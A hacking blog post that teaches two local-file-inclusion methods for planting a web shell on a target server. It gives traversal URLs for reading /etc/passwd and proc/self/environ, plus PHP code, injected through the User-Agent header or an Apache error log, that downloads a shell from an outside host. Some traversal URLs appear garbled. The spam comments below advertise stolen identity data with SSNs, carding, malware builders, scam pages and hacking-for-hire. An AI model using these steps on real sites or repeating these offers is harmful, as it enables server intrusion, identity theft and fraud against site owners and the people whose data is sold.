» » How To Upload Shell Via LFI Vul.

A+ A-


Today I Am Going To Teach You Two Ways Of Uploading Shell Via LFI Vul..
ReQuirement:- website vul to lfi.

MethoD 1:-

NOTE: You will need FireFox and its
addon Tamper Data to do this
method!

LFI or Local File Inclusion allows you
to include a local file(which means,
that the file is stored on the server)
and run it in a webscript.
In this method we are going to
upload a shell by accessing the proc/self/environ.
Now we have our page:-

http://www.target.com/index.php?
include=register.php

And now we are going to do this:-
http://www.target.com/index.php?
include=../

If it gives you an error message , this
is good. Best thing that can happen is, it says "No such file or directory".
But anyways, now add this to your url:-
http://www.target.com/index.php?
include=../etc/passwd

And as long as there is no text other
than an error message on the page,
keep adding "../" to the URL, so it would be like:

http://www.target.com/index.php?
include=.../passwd

http://www.target.com/index.php?
include=.../passwd

http://www.target.com/index.php?
include=.../passwd

And so on. Now let's say we got to this URL:-

http://www.target.com/index.php?
include=.../passwd

And we see some huge shitty text we
can not handle with. Now change the
etc/passwd in the URL to proc/self/environ so it would look like this:

http://www.target.com/index.php?
include=...environ

If you see some text, you did good, if
you see an error message you did
bad. Now this is the point where we
use Tamper Data. Start you Tamper
and reload the page, and for user
agent you type in the following PHP script:-

PHP Code:-

<?php $file = fopen
("shell.php" ,"w
+"); $stream = fopen ( "http://
www.website.com/
yourshell.txt" , "r" ); while(!
feof($stream )) {
$shell .= fgets
($stream ); } fwrite
($file , $shell ); fclose
($file );?>

This will execute the PHP script on
the site and create a shell.php on the
server. Why? Because the user agent
is being displayed on the webpage,
and if you put in a webscript for that, it will execute it.
Now simply access your shell by going to

http://www.taget.com/shell.php

And rape the server.

Now LFI method 2:-

NOTE: This only works on apache servers!
Alright you get back to the point
where we tried to access the etc/passwd. You will do the same method, but not with etc/passwd,
you will try to get access to apache/
logs/error.log

If you have a brain, you should know
how to do that, since it's EXACTLY
the same method as on etc/passwd
(explained in LFI method 1).
Now when you have found the file,
open up cmd and type in
Code:
telnet http://www.tagrget.com

80

When you are inside the telnet, you
copy the following code (you use your
own shell url:

PHP Code:

<?php $file = fopen
("shell.php" ,"w
+"); $stream = fopen ( "http://
www.website.com/
yourshell.txt" , "r" ); while(!
feof($stream )) {
$shell .= fgets
($stream ); } fwrite
($file , $shell ); fclose
($file );?>

Paste it into the telnet window, and
press enter once or maybe twice(until
you get an error message).
Now refresh the page in the browser
(error.log) once and there you go.
The PHP script will be executed and
your shell will get uploaded to the
server.
Access it by typing in the
following into your browser:-

http://www.taget.com/shell.php
ENJOY...

22:57

Post a Comment

  1. Anonymous15 October 2019 at 14:13

    Hello world
    I teach hacking andriod apk virus - windows Hacking - web server hacking -
    Reseller :- Hacking Tools & Hacking services, Also Teach Hacking Methods Via teem weaver or Anydesk,
    Each Method Take minimum 1 hour to learn with vedio Tutorial And Hacking Tools ,

    How to Make Money hacking tools,

    - Spamming & Tools ,
    - Carding & Tools ,
    - Virus with control panal and Spy bot files,
    - Virus With Builder And Crypter ,
    - Scanners with Bruters ,
    - Crypters with Doc Exploits ,pdf Exploits ,TExtfile Exploits ,
    - PHP Exploits with shell and mailer
    - OTP verications Bypass with Bulletproof Scam-page and Otp control
    - Company Ceo or cfo leads Any country
    - Rat virus with builder
    - Cookies Stealers and Builder
    - keyloger and builder
    - Credit card Scam-pages
    - Bank login Scam-pages
    - debit card topup scam page
    - donation scam-page
    - dhl login and tracking scam-page
    - fedax login and tracking scam-page
    - Shipping Tools

    Place & Ground
    learners you will pay cheap $ for demo Tools & Method

    Business grounds

    Credit card Low Interest Services,

    - Credit card with Fullz Information - Minimum Investment 150$ - With 50k Credit limit And balance
    - Debit Card Topup AS per Card limit - Minimum Investment 200$ - With 8000$ balance
    - Dating scam Fresh male female Logins - Minimum Investment 80$ - Dating Login upto 30

    -----------------
    ABOUT US :
    Icq :-675452902
    Skype: rushr00t000
    email me:- hackitbackd00r@gmail.com

    ReplyDelete
    Replies
    1. Anonymous22 March 2022 at 07:43

      How To Upload Shell Via Lfi Vul. >>>>> Download Now

      >>>>> Download Full

      How To Upload Shell Via Lfi Vul. >>>>> Download LINK

      >>>>> Download Now

      How To Upload Shell Via Lfi Vul. >>>>> Download Full

      >>>>> Download LINK mP

      Delete
  2. felisha green10 September 2020 at 08:17

    Do you need to increase your credit score?
    Do you intend to upgrade your school grade?
    Do you want to hack your cheating spouse Email, whatsapp, Facebook, instagram or any social network?
    Do you need any information concerning any database.
    Do you need to retrieve deleted files?
    Do you need to clear your criminal records or DMV?
    Do you want to remove any site or link from any blog?
    you should contact this hacker, he is reliable and good at the hack jobs..
    contact : cybergoldenhacker at gmail dot com

    ReplyDelete
  3. No Name4 February 2022 at 08:23

    FULLZ AVAILABLE WITH HIGH CREDIT SCORES 700+
    (Spammed From Credit Bureau of USA)

    =>Contact 24/7<=

    Telegram> @leadsupplier
    ICQ> 752822040

    FRESHLY SPAMMED
    VALID INFO WITH VALID DL EXPIRIES

    *All info included*
    NAME+SSN+DOB+DL+DL-STATE+ADDRESS
    Employee & Bank details included

    CC & CVV'S ONLY USA AVAILABLE

    $1 for SSN+DOB
    $2 for SSN+DOB+DL
    $5 for High credit fullz 700+
    (bulk order negotiable)
    *Payment in all crypto currencies will be accepted

    ->You can buy few for testing
    ->Invalid or wrong info will be replaced
    ->Serious buyers needed for long term

    PLEASE DON'T ASK ANYTHING FOR FREE

    TOOLS & TUTORIALS AVAILABLE FOR SPAMMING, HACKING & CARDING

    (Carding, spamming, hacking, scam page, Cash outs, dumps cash outs)

    Ethical Hacking Tools & Tutorials
    Kali linux
    Facebook & Google hacking
    SQL Injector
    Bitcoin flasher
    Keylogger & Keystroke Logger
    Premium Accounts (Netflix, coinbase, FedEx, Pornhub, etc)
    Paypal Logins
    Bitcoin Cracker
    SMTP Linux Root
    DUMPS with pins track 1 and 2
    Smtp's, Safe Socks, rdp's, VPN, Viruses
    Cpanel
    Php mailer
    Server I.P's & Proxies
    HQ Emails Combo

    *If you need a valid vendor it's very prime chance, you'll never be disappointed*

    CONTACT 24/7
    Telegram> @leadsupplier
    ICQ> 752822040

    ReplyDelete
  4. Anonymous22 March 2022 at 07:43

    How To Upload Shell Via Lfi Vul. >>>>> Download Now

    >>>>> Download Full

    How To Upload Shell Via Lfi Vul. >>>>> Download LINK

    >>>>> Download Now

    How To Upload Shell Via Lfi Vul. >>>>> Download Full

    >>>>> Download LINK

    ReplyDelete

Subscribe to: Post Comments (Atom)
 
Top